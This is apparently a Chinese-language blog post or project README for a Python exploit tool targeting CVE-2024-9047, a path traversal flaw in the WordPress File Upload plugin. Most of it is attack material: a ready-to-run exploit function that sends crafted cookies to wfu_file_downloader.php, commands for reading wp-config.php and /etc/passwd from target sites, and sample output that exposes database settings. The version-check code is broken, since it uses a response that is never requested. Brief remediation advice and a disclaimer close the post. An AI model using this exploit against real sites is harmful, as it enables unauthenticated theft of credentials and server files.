WordPress File Upload 插件路径遍历漏洞利用工具 (CVE-2024-9047)

WordPress File Upload 插件路径遍历漏洞利用工具 (CVE-2024-9047)

本项目提供了一个针对 WordPress File Upload 插件中严重安全漏洞的利用脚本。该漏洞(CVE-2024-9047)影响插件 4.24.11 及之前的所有版本,允许未经身份验证的攻击者通过路径遍历读取或删除服务器上的任意文件。

功能特性

  • 无认证利用:利用过程无需任何 WordPress 账户凭据。
  • 任意文件读取 :成功利用后,可读取服务器上任意可访问文件(如 wp-config.php)。
  • 支持自定义路径:允许用户指定要读取的目标文件路径。
  • 兼容 PHP 7.4 及更早环境:利用条件明确,针对特定 PHP 版本环境设计。
  • 命令行友好:提供简洁的参数接口,便于集成到自动化测试流程中。

安装指南

系统要求

  • Python 3.6 或更高版本
  • requests

安装步骤

  1. 克隆或下载本项目代码至本地:

    bash 复制代码
    git clone https://github.com/your-repo/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
  2. 安装 Python 依赖(如果尚未安装 requests):

    bash 复制代码
    pip install requests

使用说明

基础用法

bash 复制代码
python CVE-2024-9047.py --url <目标WordPress站点URL> [--command <目标文件路径>]
  • --url, -u:必选参数,目标 WordPress 站点的根 URL(例如 http://example.com/wordpress)。
  • --command, -c:可选参数,要读取的文件路径(相对于服务器文件系统根目录)。默认路径为 /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

典型使用场景

场景一:快速检测漏洞并读取默认配置文件
bash 复制代码
python CVE-2024-9047.py -u http://192.168.1.100/wordpress

工具将自动检测插件版本,若版本 ≤ 4.24.11 且 PHP 环境符合要求,则尝试读取默认的 wp-config.php 文件。

场景二:指定读取其他敏感文件
bash 复制代码
python CVE-2024-9047.py -u http://example.com --command /../../../../../etc/passwd
执行输出示例
php 复制代码
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
...

工作流程说明

  1. 漏洞利用 :向 /wp-content/plugins/wp-file-upload/wfu_file_downloader.php 发送 POST 请求,携带恶意构造的 Cookie 和表单数据,利用路径遍历读取目标文件。
  2. 结果输出:若攻击成功,则在控制台打印文件内容;否则显示失败状态码。

核心代码

1. 版本检测模块

python 复制代码
def check_version(url):
    try:



        if response.status_code == 200 and "Stable tag" in response.text:
            for line in response.text.splitlines():
                if "Stable tag" in line:
                    version = line.split(":")[1].strip()
                    print(f"Detected version: {version}")
                    if version <= "4.24.11":
                        print("The site is vulnerable!")
                        return True
                    else:
                        print("The site is not vulnerable.")
                        return False
        else:
            print("Unable to detect the plugin version.")
            return False
    except requests.RequestException as e:
        print(f"Error checking version: {e}")
        return False

2. 核心利用模块

python 复制代码
def exploit(url, command):
    try:
        exploit_url = f"{url}/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
        cookies = {
            "wp_wpfileupload_testupload": "Nxploited",
            "wfu_storage_file123": command,
            "wfu_download_ticket_ticket123": "9876543210987",
            "wfu_ABSPATH": "/",
        }
        data = {
            "file": "file123",
            "ticket": "ticket123",
            "handler": "dboption",
            "session_legacy": "1",
            "dboption_base": "cookies",
            "dboption_useold": "0",
            "wfu_cookie": "wp_wpfileupload_testupload",
        }

        response = requests.post(exploit_url, cookies=cookies, data=data, timeout=10)

        if response.status_code == 200:
            print("Exploit successful! Response:")
            print(response.text)
        else:
            print(f"Exploit failed. Response code: {response.status_code}")
    except requests.RequestException as e:
        print(f"Error during exploitation: {e}")

3. 主控制流程

python 复制代码
def main():
    parser = argparse.ArgumentParser(description="The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.")
    parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., http://example.com)")
    parser.add_argument("--command", "-c", default="/../../../../../opt/lampp/htdocs/wordpress/wp-config.php", help="File path to read")
    args = parser.parse_args()

    target_url = args.url.rstrip("/")
    command = args.command

    if check_version(target_url):
        exploit(target_url, command)

漏洞修复建议

  • 立即将 WordPress File Upload 插件更新至最新版本。
  • 升级 PHP 环境至 7.4 以上官方支持的版本。
  • 严格限制 Web 服务器文件系统权限,避免敏感文件可被 Web 用户读取。
  • 部署 Web 应用防火墙(WAF),拦截包含路径遍历特征的恶意请求。

免责声明

本工具及文档仅限用于安全研究、教育及授权的渗透测试。未经明确授权使用本工具攻击任何系统均属非法行为,使用者需自行承担一切法律责任。项目作者及贡献者对任何滥用行为不承担责任。 6HFtX5dABrKlqXeO5PUv/y6n7EBe6h2V2n05Vq1LwOqLqjbNI15A04sn614rpN95

相关推荐
vanuan12 分钟前
两个AI智能体第一次对话-A2A双Agent协作实战
人工智能
kfaino2 小时前
码农的AI翻身(四)你好,我叫 Attention
人工智能·后端
狼爷4 小时前
百年工业史启示:为什么AI落地普遍无效?读懂保罗·戴维的「天轴陷阱」
aigc
雨落Re4 小时前
如何设计一个高质量Skill
人工智能
Token炼金师4 小时前
大模型权重文件全指南:从格式选择到优化实战
人工智能
阿牛哥_GX4 小时前
CDP 浏览器操控原理:让脚本接管你的浏览器
人工智能
ThreeS4 小时前
手搓MiniVLA全实战教程-一步一步用pytorch解释原理与思路
人工智能·python
米小虾5 小时前
Loop Engineering —— 循环的设计与自主执行
人工智能·agent
米小虾6 小时前
Harness Engineering —— 系统的安全护栏
人工智能·agent
火山引擎开发者社区6 小时前
积分当钱花,火山引擎开发者激励计划首月消费双倍回馈
人工智能